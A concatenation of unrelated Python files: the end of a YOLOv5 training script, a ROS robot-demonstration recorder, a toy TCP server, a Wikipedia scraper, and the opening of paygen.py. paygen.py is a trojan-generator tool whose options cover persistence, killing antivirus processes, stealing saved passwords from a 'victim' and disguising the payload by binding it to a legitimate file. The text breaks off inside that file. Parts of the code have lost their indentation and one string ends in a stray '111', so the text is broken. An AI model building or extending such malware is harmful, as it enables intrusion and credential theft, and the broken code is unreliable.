                    "model": deepcopy(model.module if is_parallel(model) else model).half(),
                    "ema": deepcopy(ema.ema).half(),
                    "updates": ema.updates,
                    "optimizer": optimizer.state_dict(),
                    "wandb_id": wandb_logger.wandb_run.id if wandb_logger.wandb else None,
                }
                # Save last, best and delete
                torch.save(ckpt, last)
                if best_fitness == fi:
                    torch.save(ckpt, best)
                if wandb_logger.wandb:
                    if ((epoch + 1) % opt.save_period == 0 and not final_epoch) and opt.save_period != -1:
                        wandb_logger.log_model(last.parent, opt, epoch, fi, best_model=best_fitness == fi)
                del ckpt
        # end epoch --------------------------------------------------------------------------------------------
    # end training

    if rank in [-1, 0]:
        # Plots
        if plots:
            plot_results(save_dir=save_dir)  # save as results.png
            if wandb_logger.wandb:
                files = [
                    "results.png",
                    "confusion_matrix.png",
                    *[f"{x}_curve.png" for x in ("F1", "PR", "P", "R")],
                ]
                wandb_logger.log(
                    {
                        "Results": [
                            wandb_logger.wandb.Image(str(save_dir / f), caption=f)
                            for f in files
                            if (save_dir / f).exists()
                        ]
                    }
                )
        # Test best.pt
        logger.info("%g epochs completed in %.3f hours.\n" % (epoch - start_epoch + 1, (time.time() - t0) / 3600))
        if opt.data.endswith("coco.yaml") and nc == 80:  # if COCO
            # (last,) was previously (last) -- a bare Path -- which is not iterable
            for m in (last, best) if best.exists() else (last,):  # speed, mAP tests
                results, _, _ = test.test(
                    opt.data,
                    batch_size=batch_size * 2,
                    imgsz=imgsz_test,
                    conf_thres=0.001,
                    iou_thres=0.7,
                    model=attempt_load(m, device).half(),
                    single_cls=opt.single_cls,
                    dataloader=testloader,
                    save_dir=save_dir,
                    save_json=True,
                    plots=False,
                    is_coco=is_coco,
                )

        # Strip optimizers
        final = best if best.exists() else last  # final model
        for f in last, best:
            if f.exists():
                strip_optimizer(f)  # strip optimizers
        if opt.bucket:
            os.system(f"gsutil cp {final} gs://{opt.bucket}/weights")  # upload
        if wandb_logger.wandb:  # Log the stripped model
            wandb_logger.wandb.log_artifact(
                str(final),
                type="model",
                name="run_" + wandb_logger.wandb_run.id + "_model",
                aliases=["last", "best", "stripped"],
            )
        wandb_logger.finish_run()
    else:
        dist.destroy_process_group()
    torch.cuda.empty_cache()
    return results
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--weights", type=str, default="yolov5s.pt", help="initial weights path"
)
parser.add_argument("--cfg", type=str, default="", help="model.yaml path")
parser.add_argument(
"--data",
type=str,
default="/data/minki/kaggle/vinbigdata-cxr/yolov5/config0.yaml",
help="*.data path",
) # 'data/coco128.yaml'
# # FIXME:
# parser.add_argument(
# "--fold",
# type=str,
# required=True,
# help="0..6 data folds",
# ) # 'data/coco128.yaml'
# "data/coco128.yaml"
parser.add_argument(
"--hyp",
type=str,
default="data/hyp.scratch.yaml",
help="hyperparameters path",
)
parser.add_argument("--epochs", type=int, default=300)
parser.add_argument(
"--batch-size", type=int, default=10, help="total batch size for all GPUs"
)
parser.add_argument(
"--img-size",
nargs="+",
type=int,
default=[1024, 1024],
help="[train, test] image sizes",
)
parser.add_argument("--rect", action="store_true", help="rectangular training")
parser.add_argument(
"--resume",
nargs="?",
const=True,
default=False,
help="resume most recent training",
)
parser.add_argument(
"--nosave", action="store_true", help="only save final checkpoint"
)
parser.add_argument("--notest", action="store_true", help="only test final epoch")
parser.add_argument(
"--noautoanchor", action="store_true", help="disable autoanchor check"
)
parser.add_argument("--evolve", action="store_true", help="evolve hyperparameters")
parser.add_argument("--bucket", type=str, default="", help="gsutil bucket")
parser.add_argument(
"--cache-images", action="store_true", help="cache images for faster training"
)
parser.add_argument(
"--image-weights",
action="store_true",
help="use weighted image selection for training",
)
parser.add_argument(
"--device", default="", help="cuda device, i.e. 0 or 0,1,2,3 or cpu"
)
parser.add_argument(
"--multi-scale", action="store_true", help="vary img-size +/- 50%%"
)
parser.add_argument(
"--single-cls",
action="store_true",
help="train multi-class data as single-class",
)
parser.add_argument(
"--adam", action="store_true", help="use torch.optim.Adam() optimizer"
)
parser.add_argument(
"--sync-bn",
action="store_true",
help="use SyncBatchNorm, only available in DDP mode",
)
parser.add_argument(
"--local_rank", type=int, default=-1, help="DDP parameter, do not modify"
)
parser.add_argument(
"--workers", type=int, default=8, help="maximum number of dataloader workers"
)
parser.add_argument(
"--project",
default="/data/minki/kaggle/vinbigdata-cxr/yolov5/runs/train",
help="save to project/name",
)
parser.add_argument("--entity", default=None, help="W&B entity")
parser.add_argument("--name", default="exp", help="save to project/name")
parser.add_argument(
"--exist-ok",
action="store_true",
help="existing project/name ok, do not increment",
)
parser.add_argument("--quad", action="store_true", help="quad dataloader")
parser.add_argument("--linear-lr", action="store_true", help="linear LR")
parser.add_argument(
"--upload_dataset",
action="store_true",
help="Upload dataset as W&B artifact table",
)
parser.add_argument(
"--bbox_interval",
type=int,
default=-1,
help="Set bounding-box image logging interval for W&B",
)
parser.add_argument(
"--save_period",
type=int,
default=-1,
help='Log model after every "save_period" epoch',
)
parser.add_argument(
"--artifact_alias",
type=str,
default="latest",
help="version of dataset artifact to be used",
)
opt = parser.parse_args()
# FIXME:
# opt.data = f"{opt.data}/config{opt.fold}.yaml"
# Set DDP variables
opt.world_size = int(os.environ["WORLD_SIZE"]) if "WORLD_SIZE" in os.environ else 1
opt.global_rank = int(os.environ["RANK"]) if "RANK" in os.environ else -1
set_logging(opt.global_rank)
if opt.global_rank in [-1, 0]:
check_git_status()
check_requirements()
# Resume
wandb_run = resume_and_get_id(opt)
if opt.resume and not wandb_run: # resume an interrupted run
ckpt = (
opt.resume if isinstance(opt.resume, str) else get_latest_run()
) # specified or most recent path
assert os.path.isfile(ckpt), "ERROR: --resume checkpoint does not exist"
apriori = opt.global_rank, opt.local_rank
with open(Path(ckpt).parent.parent / "opt.yaml") as f:
opt = argparse.Namespace(**yaml.load(f, Loader=yaml.SafeLoader)) # replace
(
opt.cfg,
opt.weights,
opt.resume,
opt.batch_size,
opt.global_rank,
opt.local_rank,
) = (
"",
ckpt,
True,
opt.total_batch_size,
*apriori,
) # reinstate
logger.info("Resuming training from %s" % ckpt)
else:
# opt.hyp = opt.hyp or ('hyp.finetune.yaml' if opt.weights else 'hyp.scratch.yaml')
opt.data, opt.cfg, opt.hyp = (
check_file(opt.data),
check_file(opt.cfg),
check_file(opt.hyp),
) # check files
assert len(opt.cfg) or len(
opt.weights
), "either --cfg or --weights must be specified"
opt.img_size.extend(
[opt.img_size[-1]] * (2 - len(opt.img_size))
) # extend to 2 sizes (train, test)
opt.name = "evolve" if opt.evolve else opt.name
opt.save_dir = increment_path(
Path(opt.project) / opt.name, exist_ok=opt.exist_ok | opt.evolve
) # increment run
# DDP mode
opt.total_batch_size = opt.batch_size
device = select_device(opt.device, batch_size=opt.batch_size)
if opt.local_rank != -1:
assert torch.cuda.device_count() > opt.local_rank
torch.cuda.set_device(opt.local_rank)
device = torch.device("cuda", opt.local_rank)
dist.init_process_group(
backend="nccl", init_method="env://"
) # distributed backend
assert (
opt.batch_size % opt.world_size == 0
), "--batch-size must be multiple of CUDA device count"
opt.batch_size = opt.total_batch_size // opt.world_size
# Hyperparameters
with open(opt.hyp) as f:
hyp = yaml.load(f, Loader=yaml.SafeLoader) # load hyps
# Train
logger.info(opt)
if not opt.evolve:
tb_writer = None # init loggers
if opt.global_rank in [-1, 0]:
prefix = colorstr("tensorboard: ")
logger.info(
f"{prefix}Start with 'tensorboard --logdir {opt.project}', view at http://localhost:6006/"
)
tb_writer = SummaryWriter(opt.save_dir) # Tensorboard
train(hyp, opt, device, tb_writer)
# Evolve hyperparameters (optional)
else:
# Hyperparameter evolution metadata (mutation scale 0-1, lower_limit, upper_limit)
meta = {
"lr0": (1, 1e-5, 1e-1), # initial learning rate (SGD=1E-2, Adam=1E-3)
"lrf": (1, 0.01, 1.0), # final OneCycleLR learning rate (lr0 * lrf)
"momentum": (0.3, 0.6, 0.98), # SGD momentum/Adam beta1
"weight_decay": (1, 0.0, 0.001), # optimizer weight decay
"warmup_epochs": (1, 0.0, 5.0), # warmup epochs (fractions ok)
"warmup_momentum": (1, 0.0, 0.95), # warmup initial momentum
"warmup_bias_lr": (1, 0.0, 0.2), # warmup initial bias lr
"box": (1, 0.02, 0.2), # box loss gain
"cls": (1, 0.2, 4.0), # cls loss gain
"cls_pw": (1, 0.5, 2.0), # cls BCELoss positive_weight
"obj": (1, 0.2, 4.0), # obj loss gain (scale with pixels)
"obj_pw": (1, 0.5, 2.0), # obj BCELoss positive_weight
"iou_t": (0, 0.1, 0.7), # IoU training threshold
"anchor_t": (1, 2.0, 8.0), # anchor-multiple threshold
"anchors": (2, 2.0, 10.0), # anchors per output grid (0 to ignore)
"fl_gamma": (
0,
0.0,
2.0,
), # focal loss gamma (efficientDet default gamma=1.5)
"hsv_h": (1, 0.0, 0.1), # image HSV-Hue augmentation (fraction)
"hsv_s": (1, 0.0, 0.9), # image HSV-Saturation augmentation (fraction)
"hsv_v": (1, 0.0, 0.9), # image HSV-Value augmentation (fraction)
"degrees": (1, 0.0, 45.0), # image rotation (+/- deg)
"translate": (1, 0.0, 0.9), # image translation (+/- fraction)
"scale": (1, 0.0, 0.9), # image scale (+/- gain)
"shear": (1, 0.0, 10.0), # image shear (+/- deg)
"perspective": (
0,
0.0,
0.001,
), # image perspective (+/- fraction), range 0-0.001
"flipud": (1, 0.0, 1.0), # image flip up-down (probability)
"fliplr": (0, 0.0, 1.0), # image flip left-right (probability)
"mosaic": (1, 0.0, 1.0), # image mixup (probability)
"mixup": (1, 0.0, 1.0),
} # image mixup (probability)
assert opt.local_rank == -1, "DDP mode not implemented for --evolve"
opt.notest, opt.nosave = True, True # only test/save final epoch
# ei = [isinstance(x, (int, float)) for x in hyp.values()] # evolvable indices
yaml_file = Path(opt.save_dir) / "hyp_evolved.yaml" # save best result here
if opt.bucket:
os.system(
"gsutil cp gs://%s/evolve.txt ." % opt.bucket
) # download evolve.txt if exists
for _ in range(300): # generations to evolve
if Path(
"evolve.txt"
).exists(): # if evolve.txt exists: select best hyps and mutate
# Select parent(s)
parent = "single" # parent selection method: 'single' or 'weighted'
x = np.loadtxt("evolve.txt", ndmin=2)
n = min(5, len(x)) # number of previous results to consider
x = x[np.argsort(-fitness(x))][:n] # top n mutations
w = fitness(x) - fitness(x).min() # weights
if parent == "single" or len(x) == 1:
# x = x[random.randint(0, n - 1)] # random selection
x = x[random.choices(range(n), weights=w)[0]] # weighted selection
elif parent == "weighted":
x = (x * w.reshape(n, 1)).sum(0) / w.sum() # weighted combination
# Mutate
mp, s = 0.8, 0.2 # mutation probability, sigma
npr = np.random
npr.seed(int(time.time()))
g = np.array([x[0] for x in meta.values()]) # gains 0-1
ng = len(meta)
v = np.ones(ng)
while all(v == 1): # mutate until a change occurs (prevent duplicates)
v = (
g * (npr.random(ng) < mp) * npr.randn(ng) * npr.random() * s + 1
).clip(0.3, 3.0)
for i, k in enumerate(hyp.keys()): # plt.hist(v.ravel(), 300)
hyp[k] = float(x[i + 7] * v[i]) # mutate
# Constrain to limits
for k, v in meta.items():
hyp[k] = max(hyp[k], v[1]) # lower limit
hyp[k] = min(hyp[k], v[2]) # upper limit
hyp[k] = round(hyp[k], 5) # significant digits
# Train mutation
results = train(hyp.copy(), opt, device)
# Write mutation results
print_mutation(hyp.copy(), results, yaml_file, opt.bucket)
# Plot results
plot_evolution(yaml_file)
print(
f"Hyperparameter evolution complete. Best results saved as: {yaml_file}\n"
f"Command to train a new model with these hyperparameters: $ python train.py --hyp {yaml_file}111"
)
|
record_demonstration.py
|
#! /usr/bin/python
import rospy
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
import cv2
import sys
import os
from os.path import expanduser
import signal
import threading
from multiprocessing import Pool
import time
from random import randint
from std_msgs.msg import Float32MultiArray
from leap_client.msg import HandInfoList
def signal_handler(signal, frame):
    """SIGINT (Ctrl-C) handler: flag the recorder to stop, then exit cleanly.

    BUGFIX: the global name was broken across two source lines
    ("record_demonstratio" / "n"), which raised NameError whenever the
    handler actually fired; the identifier is rejoined here.
    """
    global record_demonstration
    record_demonstration.end_thread = True
    sys.exit(0)


signal.signal(signal.SIGINT, signal_handler)
class RecordDemonstration(object):
    """Record a robot demonstration session.

    ROS callbacks cache the latest camera images and robot-state messages;
    a background thread samples them at a fixed rate, writing JPEG frames
    under ~/t/task-<id>/<random>/camera-<n>/ and state rows to a .txt log.

    Fixes applied in review:
      * Py2-only ``except CvBridgeError, e`` -> ``except ... as e`` (valid
        on Python 2.6+ and required on Python 3).
      * ``np.float`` (removed in NumPy 1.24) -> built-in ``float``.
      * camera3 previously saved ``camera2_msg`` frames; now uses
        ``camera3_msg``.
      * ``errno`` was referenced in ``create_folders`` but never imported.
      * The guard branch of the writer loop busy-spun a full core; it now
        sleeps on the rate before continuing.
    """
    def __init__(self):
        # parameters
        self.task = 3006
        # person controlling the robot: 1-Rouhollah, 2-Pooya
        self.user_id = 1
        self.image_shape = (540, 540)           # output JPEG size (w, h)
        self.recordDelay = .03                  # sampling period in seconds (~30 Hz)
        self.camera1 = True
        self.camera2 = False
        self.camera3 = False
        self.al5d = True
        self.mico = False
        self.task_description = {
            5000: "Human demonstrations",
            3001: "Grab a bubble wrap and put it into plate",
            3002: "Push the plate to the left",
            3003: "Push the box towards the robot's base",
            3004: "Push and roll the bottle towards the robot's base",
            3005: "Pick up the towel and clean the screwdriver box",
            3006: "rotate the pliers wrench to a perpendicular orientation",
            # first camera calibration:
            1001: "Put three small objects into the container",
            1002: "Grab a pen and put it into user's hand",
            1003: "Take the stirring bar from the user, stir a coffee cup, give it back to the user",
            1004: "Grab capsules from the table and put them into their bottle",
            1005: "Grab a paper cup and pour its content into a plate",
            1006: "Push all small cubes and gather them in the middle of table",
            1007: "The small towel is already folded. fold it one more time",
            1008: "Grab a paper cup and put it into a tea cup",
            1009: "Grab the spoon and fork and put them into the plate, spoon on right, fork on left",
            1010: "Pick up a thick marker and put it into upright position",
            1011: "Push and rotate the markers and gather them close to the robot base",
            1012: "Stay in the middle position. Don't move!",
            1013: "Pick up a mug and place it on the table where the user is pointing",
            1014: "scoop ...",
            # second camera calibration:
            1501: "Grab 6 small cubes in a cluttered situation and put them into a plate",
            1502: "Grab a marker and put it into the cup. Then, put it back on the table.",
            # second camera calibration, each task 5 minutes, 10,000 waypoints
            2001: "Grab 3 small markers and arrange them vertically on the right side",
            2002: "Grab 3 small markers and arrange them horizontally on the right side",
            2003: "Grab 3 small markers and arrange them vertically on the left side",
            2004: "Grab 3 small markers and arrange them horizontally on the left side",
            2005: "Grab 3 small markers and make a triangle with them",
            2006: "Grab 3 small markers, put one on the left, one on the right, and one in the middle",
            2007: "Grab 3 small markers and make a horizontal line with them",
            2008: "Grab 3 small markers and write the character Y with them",
            2009: "Grab 3 small markers and write the character U with them",
            2010: "Grab 3 small markers and write the character H with them",
            2011: "Grab 3 small markers and write the character N with them",
            2012: "Grab 3 small markers and write the character T with them",
            2013: "Grab 3 small markers and write the reversed character N with them",
            2014: "Grab 3 small markers and write the reversed character Y with them",
            2015: "Grab 3 small markers and write the reversed character U with them",
            2016: "Grab 3 small markers and write the 90 degree rotated character H with them",
            2017: "Grab 3 small markers and write the reversed character T with them",
            2018: "Grab 3 small markers and write the character K with them",
            2019: "Grab 3 small markers, put one vertically on the right, and two vertically on the left",
            2020: "Grab 3 small markers, put one vertically on the left, and two vertically on the right",
            2021: "Grab 3 small markers, put one horizontally on the right, and two horizontally on the left",
            2022: "Grab 3 small markers, put one horizontally on the left, and two horizontally on the right",
            2023: "Grab 3 small markers, put one vertically on the right, and two horizontally on the left",
            2024: "Grab 3 small markers, put one horizontally on the left, and two vertically on the right",
            2025: "Grab 3 small markers, put one vertically on the right, and make a vertical line with the other two",
            2026: "Grab 3 small markers, put one vertically on the left, and make a vertical line with the other two",
            2027: "Grab 3 small markers, put one vertically on the right, and make a horizontal line with the other two",
            2028: "Grab 3 small markers, put one vertically on the left, and make a horizontal line with the other two",
            2029: "Grab 3 small markers and put them into the coffee cup on the right",
            2030: "Grab 3 small markers that are inside a coffee cup on the right and put them on the desk",
            2031: "Grab 3 small markers and put them into the coffee cup on the left",
            2032: "Grab 3 small markers that are inside a coffee cup on the left and put them on the desk",
            2033: "Grab 3 small markers, put one into the coffee cup on the left, and the others into the coffee cup on the right",
            2034: "Grab 3 small markers, put one into the coffee cup on the right, and the others into the coffee cup on the left",
            2035: "Grab 2 small markers, put one into the coffee cup on the right, and the other into the coffee cup on the left",
            2036: "Grab 2 small markers, put one into the coffee cup on the left, and the other into the coffee cup on the right",
            2037: "Grab one small marker from each coffee cup and put them on the desk",
            2038: "Grab one small marker from the coffee cup on the right and put it into the coffee cup on the left",
            2039: "Grab one small marker from the coffee cup on the left and put it into the coffee cup on the right",
            2040: "Grab 4 small markers and make a square with them",
            2041: "Grab 4 small markers and make a cross with them",
            2042: "Grab 4 small markers and make a 45 degree rotated square with them",
            2043: "Grab 4 small markers and make a plus with them",
            2044: "Grab 4 small markers, put one vertically on the right and three vertically on the left",
            2045: "Grab 4 small markers, put one horizontally on the right and three vertically on the left",
            2046: "Grab 4 small markers, put one vertically on the right and three horizontally on the left",
            2047: "Grab 4 small markers, put one horizontally on the right and three horizontally on the left",
            2048: "Grab 4 small markers, put two vertically on the right and two vertically on the left",
            2049: "Grab 4 small markers, put two horizontally on the right and two vertically on the left",
            2050: "Grab 4 small markers, put two vertically on the right and two horizontally on the left",
            2051: "Grab 4 small markers, put two horizontally on the right and two horizontally on the left",
            2052: "Grab 4 small markers and draw the bottom half of a star with them",
            2053: "Grab 4 small markers and draw the upper half of a star with them",
            2054: "Grab 4 small markers and draw the character '=' with them",
            2055: "Grab 4 small markers and draw the 90 degree rotated character '=' with them",
            2056: "Grab 4 small markers and draw the character 'W' with them",
            2057: "Grab 4 small markers and draw the character 'M' with them",
            2058: "Grab 4 small markers and draw the character 'E' with them",
            2059: "Grab 4 small markers and draw the reversed character 'E' with them",
            2060: "Grab 4 small markers and draw the character 'm' with them",
            2061: "Grab 4 small markers and draw the reversed character 'm' with them",
        }
        # initialization
        self.filepath = expanduser("~") + '/t/task-' + str(self.task) + '/' + str(randint(0,1000000))
        rospy.init_node('record_demonstration')
        if self.camera1:
            self.create_folders(self.filepath + '/camera-' + str(1) + '/')
            # self.create_folders(self.filepath + '/camera-' + str(1) + '-depth/')
            rospy.Subscriber("/kinect2/qhd/image_color_rect", Image, self.camera1_callback)
            # rospy.Subscriber("/kinect2/hd/image_depth_rect", Image, self.camera1_depth_callback)
        if self.camera2:
            self.create_folders(self.filepath + '/camera-' + str(2) + '/')
            rospy.Subscriber("/usb_cam/image_raw", Image, self.camera2_callback)
        if self.camera3:
            self.create_folders(self.filepath + '/camera-' + str(3) + '/')
            rospy.Subscriber("/kinect2/qhd/image_color_rect", Image, self.camera3_callback)
        if self.al5d:
            self.write_file_header()
            rospy.Subscriber("/leap_al5d_info", Float32MultiArray, self.leap_al5d_callback)
        if self.mico:
            self.write_file_header()
            rospy.Subscriber("/leap_mico_info", Float32MultiArray, self.leap_mico_callback)
        self.bridge = CvBridge()
        self.timestep = 0
        self.task_complete_count = 0
        # rospy.Rate takes a frequency in Hz: 0.03 s period -> 30 Hz
        self.rate = rospy.Rate(self.recordDelay*1000)
        self.last_reward_time = 0
        self.last_robot_msg = 0
        self.start_time = rospy.get_time()
        self.end_thread = False     # set True (e.g. by SIGINT) to stop the writer
        self.pause = False          # set True to suspend recording
        # self.pool = Pool(2)
        self.thread = threading.Thread(target= self._update_thread)
        self.thread.start()

    def save_image(self, img_msg, camera):
        """Convert a ROS color image to OpenCV, crop, resize, and save as JPEG."""
        try:
            img = self.bridge.imgmsg_to_cv2(img_msg, "bgr8")
            # np.float was a deprecated alias removed in NumPy 1.24; use float
            img = np.array(img, dtype=float)
        except CvBridgeError as e:
            print(e)
        else:
            # crop to the 540x590 workspace region, then resize to image_shape
            img = img[0:540, 250:840]
            img = cv2.resize(img, self.image_shape)
            cv2.imwrite(self.filepath + '/camera-' + str(camera) + '/' + str(self.timestep) +
                        '.jpg', img, [int(cv2.IMWRITE_JPEG_QUALITY), 80])

    def save_image_depth(self, img_msg, camera):
        """Convert a 16-bit ROS depth image, normalize to [0,1], and save as JPEG."""
        try:
            img = self.bridge.imgmsg_to_cv2(img_msg, "16UC1")
            img = np.array(img, dtype=np.float32)
            cv2.normalize(img, img, 0, 1, cv2.NORM_MINMAX)
        except CvBridgeError as e:
            print(e)
        else:
            img = cv2.resize(img, self.image_shape)
            cv2.imwrite(self.filepath + '/camera-' + str(camera) + '-depth/' + str(self.timestep) +
                        '.jpg', img*255.0, [int(cv2.IMWRITE_JPEG_QUALITY), 80])

    # --- ROS callbacks: cache the latest message of each stream ---
    def camera1_callback(self, msg):
        self.camera1_msg = msg

    def camera1_depth_callback(self, msg):
        self.camera1_depth_msg = msg

    def camera2_callback(self, msg):
        self.camera2_msg = msg

    def camera3_callback(self, msg):
        self.camera3_msg = msg

    def leap_al5d_callback(self, msg):
        # also remember arrival time so the writer can detect a stale robot feed
        self.leap_al5d_msg = msg
        self.last_robot_msg = rospy.get_time()

    def leap_mico_callback(self, msg):
        self.leap_mico_msg = msg

    def create_folders(self, foldername):
        """Create foldername (and parents) if missing, tolerating races."""
        import errno  # FIX: errno was referenced below but never imported
        if not os.path.exists(foldername):
            try:
                os.makedirs(foldername)
            except OSError as exc:  # Guard against race condition
                if exc.errno != errno.EEXIST:
                    raise

    def write_file_header(self):
        """(Over)write the state log with a timestamp, task text, and CSV header."""
        with open(self.filepath + '.txt', 'w') as f:
            f.write(str(time.strftime('%l:%M%p %z on %b %d, %Y')) + '\n' + str(self.task_description[self.task]) + '\n')
            f.write('time,task,user,robot,reward,human,gripper,joint1,joint2,joint3,joint4,joint5,joint6')

    def append_to_file(self, robot):
        """Append one CSV state row for `robot` ('al5d' or 'mico') to the log.

        data[0] carries the reward signal; a value of ~1 counts as a task
        completion at most once per second (debounced via last_reward_time).
        """
        with open(self.filepath + '.txt', 'a') as f:
            str_to_append = '\n' + str(rospy.get_time() - self.start_time) + ',' + str(self.task) + ',' + str(self.user_id) + ','
            if robot == 'al5d':
                str_to_append = str_to_append + str(1) + ','
                data = [x for x in self.leap_al5d_msg.data]
            elif robot == 'mico':
                str_to_append = str_to_append + str(2) + ','
                data = [x for x in self.leap_mico_msg.data]
            if abs(data[0] - 1) < .01: # got reward
                if rospy.get_time() - self.last_reward_time > 1:
                    self.task_complete_count += 1
                self.last_reward_time = rospy.get_time()
            else:
                data[0] = 0
            sys.stdout.write('\rTimestep: ' + str(self.timestep) + ' Task done: ' + str(self.task_complete_count))
            sys.stdout.flush()
            str_to_append = str_to_append + ','.join(str(e) for e in data)
            f.write(str_to_append)

    def _update_thread(self):
        """Writer loop: each tick, save one frame per enabled camera and one
        state row per enabled robot, then advance the timestep."""
        while not rospy.is_shutdown() and not self.end_thread:
            if self.pause or rospy.get_time() - self.start_time < 1 or rospy.get_time() - self.last_robot_msg > .1:
                # FIX: sleep here too — a bare `continue` busy-spun a full core
                self.rate.sleep()
                continue
            # record only once every enabled source has delivered a message
            save_files = (self.camera1 == hasattr(self, 'camera1_msg') and self.camera2 == hasattr(self, 'camera2_msg')
                and self.camera3 == hasattr(self, 'camera3_msg') and self.al5d == hasattr(self, 'leap_al5d_msg')
                and self.mico == hasattr(self, 'leap_mico_msg'))
            if save_files:
                if self.camera1:
                    # # self.pool.map(self.save_image, [(self.camera1_msg, 1)])
                    self.save_image(self.camera1_msg, 1)
                    # self.save_image_depth(self.camera1_depth_msg, 1)
                if self.camera2:
                    # self.pool.map(self.save_image, [(self.camera2_msg, 2)])
                    self.save_image(self.camera2_msg, 2)
                if self.camera3:
                    # FIX: previously saved camera2's frame under camera 3
                    self.save_image(self.camera3_msg, 3)
                if self.al5d:
                    self.append_to_file('al5d')
                if self.mico:
                    self.append_to_file('mico')
                self.timestep += 1
            self.rate.sleep()
def main():
    """Entry point: build the recorder (which starts its own writer thread)
    and block in rospy.spin() until shutdown."""
    global record_demonstration
    record_demonstration = RecordDemonstration()
    rospy.spin()
    # Alternative interactive loop (toggle pause on Enter), kept for reference:
    # while not rospy.is_shutdown() and not record_demonstration.end_thread:
    # input = raw_input(">>>")
    # record_demonstration.pause = not record_demonstration.pause
if __name__ == '__main__':
main()
|
tcp_server.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 22 16:55:20 2020
@author: edoardottt
"""
import socket
import threading
bind_ip = "127.0.0.1"
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
print("[*] Listening on {}:{}".format(bind_ip, bind_port))
# this is our client-handling thread
def handle_client(client_socket):
    """Serve a single client: log whatever it sends, reply ACK!, close.

    One short-lived thread runs this per accepted connection.
    """
    data = client_socket.recv(4096)
    print("[*] Received: {}".format(data))
    client_socket.send(b"ACK!")
    client_socket.close()
while True:
    # accept() blocks until a client connects
    client, addr = server.accept()
    print("[*] Accepted connection from {}:{}".format(addr[0], addr[1]))
    # spin up our client thread to handle incoming data
    client_handler = threading.Thread(target=handle_client, args=(client,))
    client_handler.start()
|
Wikipedia.py
|
import wikipedia
import itertools
import threading
import time
import sys
#print(wikipedia.search('Egypt', results=15))
#print(wikipedia.geosearch(40.775114, -73.968802,title=None, results=10, radius=1000))
TitlesList = []   # page titles returned by the Wikipedia search
Results = []      # full page contents, parallel to TitlesList
print("")
topic = input('Please Enter The Topic : ')
n = int(input('Please Enter Number Of Result You Want [The Larger Number > The More Searching Time] : '))
# NOTE(review): the search runs even when n == 0; the guard below only exits
# afterwards — harmless but wasteful.
for title in wikipedia.search(topic,n) :
    TitlesList.append(title)
print("")
if n == 0:
    print(' You Entered [0] So There Is No Result For You Today :D ')
    exit()
print('[Please Wait] We Are Working Hard On The Following Topics')
print(TitlesList)
print("")
# Cosmetic progress counter (~10 s); no real connection happens here.
for x in range(100):
    sys.stdout.write('\rConnecting To Servers .... ' +str(x))
    sys.stdout.flush()
    time.sleep(0.1)
time.sleep(5)
done = False   # flag polled by the spinner thread below
def animate():
    """Console spinner shown while pages download; exits when the module
    global `done` is set to True by the main script."""
    frames = itertools.cycle(['|', '/', '-', '\\'])
    for frame in frames:
        if done:
            break
        sys.stdout.write('\rGrabing Data .... ' + frame)
        sys.stdout.flush()
        time.sleep(0.1)
    print("\n")
# Run the spinner on a background thread while pages are fetched.
t = threading.Thread(target=animate)
t.start()
# Download the full content of every matched page.
for onetitle in TitlesList:
    titlePage = wikipedia.page(onetitle)
    Results.append(titlePage.content)
time.sleep(10)
print('==============================================================================')
num = 0
done=True   # stop the spinner thread
# Write each page to <title>.txt.
# NOTE(review): titles may contain characters that are invalid in file
# names on some platforms — confirm before relying on this.
for title in TitlesList:
    with open(title+'.txt', 'w', encoding="utf-8") as output:
        output.writelines(' ------ '+title+' ------ '+'\n')
        output.writelines('==================================================\n')
        output.writelines(Results[num])
        num = num+1
        output.writelines('\n')
        output.writelines('==================================================\n')
        print(' '+title+' <-> Done')
time.sleep(5)
|
paygen.py
|
#!/usr/bin/env python3
import encrypt_code
import os
import argparse
import subprocess
import shutil
import banners
import platform
from essential_generators import DocumentGenerator
from colorama import init
from colorama import Fore, Back, Style
init()
if platform.system() == 'Windows':
PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")
Attacker_System = 'Windows'
elif platform.system() == 'Linux':
Attacker_System = 'Linux'
PYTHON_PYINSTALLER_PATH = "wine ~/.wine/drive_c/Python37-32/Scripts/pyinstaller.exe"
def get_options():
parser = argparse.ArgumentParser(description=f'{Fore.RED}THorse v1.7')
parser._optionals.title = f"{Fore.GREEN}Optional Arguments{Fore.YELLOW}"
parser.add_argument("-w", "--windows", dest="windows", help="Generate a Windows executable.", action='store_true')
parser.add_argument("-l", "--linux", dest="linux", help="Generate a Linux executable.", action='store_true')
parser.add_argument("-t", "--persistence", dest="time_persistent", help="Becoming Persistence After __ seconds. default=10", default=10)
parser.add_argument("-b", "--bind", dest="bind", help="AutoBinder : Specify Path of Legitimate file.")
parser.add_argument("-k", "--kill_av", dest="kill_av", help="AntivirusKiller : Specify AV's .exe which need to be killed. Ex:- --kill_av cmd.exe")
parser.add_argument("-s", "--steal-password", dest="stealer", help=f"Steal Saved Password from Victim Machine [{Fore.RED}Supported OS : Windows{Fore.YELLOW}]", action='store_true')
parser.add_argument("-d", "--debug", dest="debug", help=f"Run Virus in Foreground", action='store_true')
required_arguments = parser.add_argument_group(f'{Fore.RED}Required Arguments{Fore.GREEN}')
required_arguments.add_argument("--icon", dest="icon", help="Specify Icon Path, Icon of Evil File [Note : Must Be .ico].")
required_arguments.add_argument("--ip", dest="ip", help="Email address to send reports to.")
required_arguments.add_argument("--port", dest="port", help="Port of the IP Address given in the --ip argument.")
required_arguments.add_argument("-e", "--email", dest="email", help="Email address to send \'TrojanHorse Started\' Notification with other Juicy Info.")
required_arguments.add_argument("-p", "--password", dest="password", help="Password for the email address given in the -e argument.")
required_arguments.add_argument("-o", "--output", dest="output", help="Output file name.", required=True)
return parser.parse_args()
def get_python_pyinstaller_path():
try:
if os.name in ('ce', 'nt', 'dos'):
# If OS == Windows
python_path = subprocess.check_output("where pyinstaller.exe", shell=True)
elif 'posix' in os.name:
# If OS == Linux
python_path = subprocess.check_output("which pyinstaller.exe", shell=True)
python_path = str(python_path).split('\'')[1]
python_path = python_path.split("\\n")[0]
python_path = python_path.replace("\\r", "")
python_path = python_path.replace("\\\\", "/")
except Exception:
python_path = "UnableToFind"
return python_path
def check_dependencies():
print(f"{Fore.YELLOW}\n[*] Checking Dependencies...")
try:
